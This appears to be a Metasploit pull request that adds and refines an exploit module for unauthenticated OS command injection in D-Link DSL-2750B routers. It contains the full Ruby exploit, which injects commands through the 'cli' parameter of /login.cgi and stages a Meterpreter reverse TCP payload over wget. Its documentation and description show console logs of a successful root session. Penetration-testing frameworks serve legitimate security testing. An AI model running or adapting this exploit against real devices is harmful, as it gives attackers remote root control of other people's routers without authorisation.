### PR TITLE
D-Link DSL-2750B Unauthenticated OS Command Injection

### DIFF
--- a/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
+++ b/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
@@ -1,0 +1,61 @@
+This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter.
+Vulnerable firmwares are 1.01 up to 1.03.
+
+## Vulnerable Application
+
+  1. Start msfconsole
+  2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
+  3. Do : `set RHOST [RouterIP]`
+  4. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp`
+  5. Do : `run`
+  6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session
+
+
+## Example
+
+```
+msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth 
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp 
+PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
+LHOST => eth0
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
+LPORT => 5555
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run
+
+[*] Started reverse TCP handler on 192.168.1.6:5555 
+[*] 192.168.1.1:80 Checking target version...
+[*] Using URL: http://0.0.0.0:8080/V9GiueD0WW
+[*] Local IP: http://192.168.1.6:8080/V9GiueD0WW
+[*] Client 192.168.1.1 (Wget) requested /V9GiueD0WW
+[*] Sending payload to 192.168.1.1 (Wget)
+[*] Sending stage (1104216 bytes) to 192.168.1.1
+[*] Meterpreter session 18 opened (192.168.1.6:5555 -> 192.168.1.1:37259) at 2018-05-13 14:58:08 -0400
+[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Server stopped.
+
+meterpreter > ls -la
+Listing: /
+==========
+
+Mode              Size    Type  Last modified              Name
+----              ----    ----  -------------              ----
+40755/rwxr-xr-x   2554    dir   2013-03-11 07:27:09 -0400  bin
+40755/rwxr-xr-x   3       dir   2013-03-11 07:27:54 -0400  data
+40755/rwxr-xr-x   2482    dir   2013-03-11 07:27:56 -0400  dev
+40755/rwxr-xr-x   779     dir   2013-03-11 07:27:55 -0400  etc
+40755/rwxr-xr-x   690     dir   2013-03-11 07:27:55 -0400  lib
+100755/rwxr-xr-x  287124  fil   2013-03-11 07:27:55 -0400  linuxrc
+40755/rwxr-xr-x   0       dir   1969-12-31 19:00:01 -0500  mnt
+40755/rwxr-xr-x   56      dir   2013-03-11 07:13:15 -0400  opt
+40555/r-xr-xr-x   0       dir   1969-12-31 19:00:00 -0500  proc
+40755/rwxr-xr-x   270     dir   2013-03-11 07:25:43 -0400  sbin
+40755/rwxr-xr-x   0       dir   1969-12-31 19:00:00 -0500  sys
+40755/rwxr-xr-x   0       dir   2016-10-07 17:20:39 -0400  tmp
+40755/rwxr-xr-x   38      dir   2013-03-11 07:23:32 -0400  usr
+40755/rwxr-xr-x   0       dir   2016-10-07 17:16:34 -0400  var
+40755/rwxr-xr-x   2801    dir   2013-03-11 07:26:34 -0400  webs
+
+```

--- a/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
+++ b/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
@@ -25,15 +25,17 @@ msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
 LPORT => 5555
 msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run
 
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run
+
 [*] Started reverse TCP handler on 192.168.1.6:5555 
 [*] 192.168.1.1:80 Checking target version...
-[*] Using URL: http://0.0.0.0:8080/V9GiueD0WW
-[*] Local IP: http://192.168.1.6:8080/V9GiueD0WW
-[*] Client 192.168.1.1 (Wget) requested /V9GiueD0WW
+[*] Using URL: http://0.0.0.0:8080/1M6nI0Or6FUiW
+[*] Local IP: http://192.168.1.6:8080/1M6nI0Or6FUiW
+[*] Client 192.168.1.1 (Wget) requested /1M6nI0Or6FUiW
 [*] Sending payload to 192.168.1.1 (Wget)
 [*] Sending stage (1104216 bytes) to 192.168.1.1
-[*] Meterpreter session 18 opened (192.168.1.6:5555 -> 192.168.1.1:37259) at 2018-05-13 14:58:08 -0400
-[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Meterpreter session 25 opened (192.168.1.6:5555 -> 192.168.1.1:48989) at 2018-05-14 05:30:49 -0400
+[*] Command Stager progress - 100.00% done (117/117 bytes)
 [*] Server stopped.
 
 meterpreter > ls -la
@@ -53,9 +55,18 @@ Mode              Size    Type  Last modified              Name
 40555/r-xr-xr-x   0       dir   1969-12-31 19:00:00 -0500  proc
 40755/rwxr-xr-x   270     dir   2013-03-11 07:25:43 -0400  sbin
 40755/rwxr-xr-x   0       dir   1969-12-31 19:00:00 -0500  sys
-40755/rwxr-xr-x   0       dir   2016-10-07 17:20:39 -0400  tmp
+40755/rwxr-xr-x   0       dir   2016-10-08 07:54:13 -0400  tmp
 40755/rwxr-xr-x   38      dir   2013-03-11 07:23:32 -0400  usr
-40755/rwxr-xr-x   0       dir   2016-10-07 17:16:34 -0400  var
+40755/rwxr-xr-x   0       dir   2016-10-08 07:46:13 -0400  var
 40755/rwxr-xr-x   2801    dir   2013-03-11 07:26:34 -0400  webs
 
+meterpreter > sysinfo
+Computer     : 192.168.1.1
+OS           :  (Linux 2.6.30)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > 
 ```

--- a/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
+++ b/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
@@ -1,7 +1,9 @@
+## Description
+
 This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter.
 Vulnerable firmwares are 1.01 up to 1.03.
 
-## Vulnerable Application
+## Verification Steps 
 
   1. Start msfconsole
   2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
@@ -11,7 +13,7 @@ Vulnerable firmwares are 1.01 up to 1.03.
   6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session
 
 
-## Example
+## Scenarios 
 
 ```
 msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth 

--- a/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
@@ -51,53 +51,47 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    begin
-      res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => '/ayefeaturesconvert.js'
-      })
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/ayefeaturesconvert.js'
+    })
 
-      unless res
-        vprint_error('Connection failed')
-        return CheckCode::Unknown
-      end
-
-      unless res.code.to_i == 200 && res.body.include?('DSL-2750')
-        vprint_status('Remote host is not a DSL-2750')
-        return CheckCode::Safe
-      end
-
-      if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
-        version = $1
-        vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
-        if version >= "1.01" and version <= "1.03"
-          return Exploit::CheckCode::Appears
-        end
-      end
-
-      CheckCode::Safe
-    rescue ::Rex::ConnectionError
+    unless res
       vprint_error('Connection failed')
       return CheckCode::Unknown
     end
+
+    unless res.code.to_i == 200 && res.body.include?('DSL-2750')
+      vprint_status('Remote host is not a DSL-2750')
+      return CheckCode::Safe
+    end
+
+    if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
+      version = $1
+      vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
+      if version >= "1.01" and version <= "1.03"
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    vprint_error('Connection failed')
+    return CheckCode::Unknown
   end
 
   def execute_command(cmd, opts)
-    begin
-      payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
-      res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => '/login.cgi',
-        'vars_get' => {
-          'cli' => "#{payload}$"
-        },
-        'encode_params' => false
-      }, 5)
-
-      return res
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
-    end
+    payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/login.cgi',
+      'vars_get' => {
+        'cli' => "#{payload}$"
+      },
+      'encode_params' => false
+    }, 5)
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
   end
 
   def exploit

--- a/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
         Vulnerability can be exploited through "cli" parameter that is directly used to invoke
-        "ayecli" binary.
+	"ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
       },
       'Author'         =>
         [

--- a/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
@@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           ['PACKETSTORM', 135706],
           ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
+          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/'],
         ],
       'Targets'        =>
         [
@@ -45,6 +46,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DisclosureDate'  => 'Feb 5 2016',
       'DefaultTarget'   => 0))
+
+      deregister_options('CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -54,27 +57,41 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => '/ayefeaturesconvert.js'
       })
 
-      if res && [200].include?(res.code) && res.body =~ /DSL-2750/ && res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
+      unless res
+        vprint_error('Connection failed')
+        return CheckCode::Unknown
+      end
+
+      unless res.code.to_i == 200 && res.body.include?('DSL-2750')
+        vprint_status('Remote host is not a DSL-2750')
+        return CheckCode::Safe
+      end
+
+      if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
         version = $1
+        vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
         if version >= "1.01" and version <= "1.03"
           return Exploit::CheckCode::Appears
-        else
-          return Exploit::CheckCode::Safe
         end
       end
-    rescue ::Rex::ConnectionError
-      return Exploit::CheckCode::Unknown
-    end
 
-    Exploit::CheckCode::Unknown
+      CheckCode::Safe
+    rescue ::Rex::ConnectionError
+      vprint_error('Connection failed')
+      return CheckCode::Unknown
+    end
   end
 
   def execute_command(cmd, opts)
     begin
-      path = "/login.cgi?cli=multilingual show';#{cmd}'$".gsub(/ /, "%20").gsub(/&/, "%26")
+      payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
       res = send_request_cgi({
         'method' => 'GET',
-        'uri'    => path,
+        'uri' => '/login.cgi',
+        'vars_get' => {
+          'cli' => "#{payload}$"
+        },
+        'encode_params' => false
       }, 5)
 
       return res
@@ -87,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{peer} Checking target version...")
 
     unless check == Exploit::CheckCode::Appears
-      return
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
 
     execute_cmdstager(

--- a/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
@@ -1,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link DSL-2750B OS Command Injection',
+      'Description'    => %q{
+        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
+        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
+        "ayecli" binary.
+      },
+      'Author'         =>
+        [
+          'p@ql',  # vulnerability discovery
+          'Marcin Bury <marcin[at]threat9.com>'  # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['PACKETSTORM', 135706],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
+        ],
+      'Targets'        =>
+        [
+          [ 'Linux mipsbe Payload',
+            {
+            'Arch' => ARCH_MIPSBE,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'Linux mipsel Payload',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 5 2016',
+      'DefaultTarget'   => 0))
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => '/ayefeaturesconvert.js'
+      })
+
+      if res && [200].include?(res.code) && res.body =~ /DSL-2750/ && res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
+        version = $1
+        if version >= "1.01" and version <= "1.03"
+          return Exploit::CheckCode::Appears
+        else
+          return Exploit::CheckCode::Safe
+        end
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      path = "/login.cgi?cli=multilingual show';#{cmd}'$".gsub(/ /, "%20").gsub(/&/, "%26")
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => path,
+      }, 5)
+
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} Checking target version...")
+
+    unless check == Exploit::CheckCode::Appears
+      return
+    end
+
+    execute_cmdstager(
+       :flavor => :wget,
+       :linemax => 200
+    )
+  end
+end

--- a/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
@@ -12,49 +12,51 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'D-Link DSL-2750B OS Command Injection',
-      'Description'    => %q{
+      'Description'    => %q(
         This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
         Vulnerability can be exploited through "cli" parameter that is directly used to invoke
         "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
-      },
+      ),
       'Author'         =>
         [
-          'p@ql',  # vulnerability discovery
-          'Marcin Bury <marcin[at]threat9.com>'  # metasploit module
+          'p@ql', # vulnerability discovery
+          'Marcin Bury <marcin[at]threat9.com>' # metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
           ['PACKETSTORM', 135706],
           ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
-          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/'],
+          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
         ],
       'Targets'        =>
         [
-          [ 'Linux mipsbe Payload',
+          [
+            'Linux mipsbe Payload',
             {
-            'Arch' => ARCH_MIPSBE,
-            'Platform' => 'linux'
+              'Arch' => ARCH_MIPSBE,
+              'Platform' => 'linux'
             }
           ],
-          [ 'Linux mipsel Payload',
+          [
+            'Linux mipsel Payload',
             {
-            'Arch' => ARCH_MIPSLE,
-            'Platform' => 'linux'
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux'
             }
-          ],
+          ]
         ],
       'DisclosureDate'  => 'Feb 5 2016',
       'DefaultTarget'   => 0))
 
-      deregister_options('CMDSTAGER::FLAVOR')
+    deregister_options('CMDSTAGER::FLAVOR')
   end
 
   def check
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
       'uri' => '/ayefeaturesconvert.js'
-    })
+    )
 
     unless res
       vprint_error('Connection failed')
@@ -67,9 +69,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
-      version = $1
+      version = Regexp.last_match[1]
       vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
-      if version >= "1.01" and version <= "1.03"
+      if version >= "1.01" && version <= "1.03"
         return Exploit::CheckCode::Appears
       end
     end
@@ -80,16 +82,19 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown
   end
 
-  def execute_command(cmd, opts)
+  def execute_command(cmd, _opts)
     payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => '/login.cgi',
-      'vars_get' => {
-        'cli' => "#{payload}$"
+    send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => '/login.cgi',
+        'vars_get' => {
+          'cli' => "#{payload}$"
+        },
+        'encode_params' => false
       },
-      'encode_params' => false
-    }, 5)
+      5
+    )
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
   end
@@ -98,12 +103,12 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{peer} Checking target version...")
 
     unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
     end
 
     execute_cmdstager(
-       :flavor => :wget,
-       :linemax => 200
+      flavor: :wget,
+      linemax: 200
     )
   end
 end

--- a/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
         Vulnerability can be exploited through "cli" parameter that is directly used to invoke
-	"ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
+        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
       },
       'Author'         =>
         [


### PR DESCRIPTION
This PR adds module that exploits unauthenticated os command injection in D-Link DSL-2750B devices (1.01 <= firmware <= 1.03).

## Verification

  1. Start msfconsole
  2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
  3. Do : `set RHOST [RouterIP]`
  4. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp`
  5. Do : `run`
  6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session


## Example

```
msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth 
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp 
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
LHOST => eth0
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
LPORT => 5555
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run

[*] Started reverse TCP handler on 192.168.1.6:5555 
[*] 192.168.1.1:80 Checking target version...
[*] Using URL: http://0.0.0.0:8080/V9GiueD0WW
[*] Local IP: http://192.168.1.6:8080/V9GiueD0WW
[*] Client 192.168.1.1 (Wget) requested /V9GiueD0WW
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (1104216 bytes) to 192.168.1.1
[*] Meterpreter session 18 opened (192.168.1.6:5555 -> 192.168.1.1:37259) at 2018-05-13 14:58:08 -0400
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter > ls -la
Listing: /
==========

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40755/rwxr-xr-x   2554    dir   2013-03-11 07:27:09 -0400  bin
40755/rwxr-xr-x   3       dir   2013-03-11 07:27:54 -0400  data
40755/rwxr-xr-x   2482    dir   2013-03-11 07:27:56 -0400  dev
40755/rwxr-xr-x   779     dir   2013-03-11 07:27:55 -0400  etc
40755/rwxr-xr-x   690     dir   2013-03-11 07:27:55 -0400  lib
100755/rwxr-xr-x  287124  fil   2013-03-11 07:27:55 -0400  linuxrc
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:01 -0500  mnt
40755/rwxr-xr-x   56      dir   2013-03-11 07:13:15 -0400  opt
40555/r-xr-xr-x   0       dir   1969-12-31 19:00:00 -0500  proc
40755/rwxr-xr-x   270     dir   2013-03-11 07:25:43 -0400  sbin
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:00 -0500  sys
40755/rwxr-xr-x   0       dir   2016-10-07 17:20:39 -0400  tmp
40755/rwxr-xr-x   38      dir   2013-03-11 07:23:32 -0400  usr
40755/rwxr-xr-x   0       dir   2016-10-07 17:16:34 -0400  var
40755/rwxr-xr-x   2801    dir   2013-03-11 07:26:34 -0400  webs
```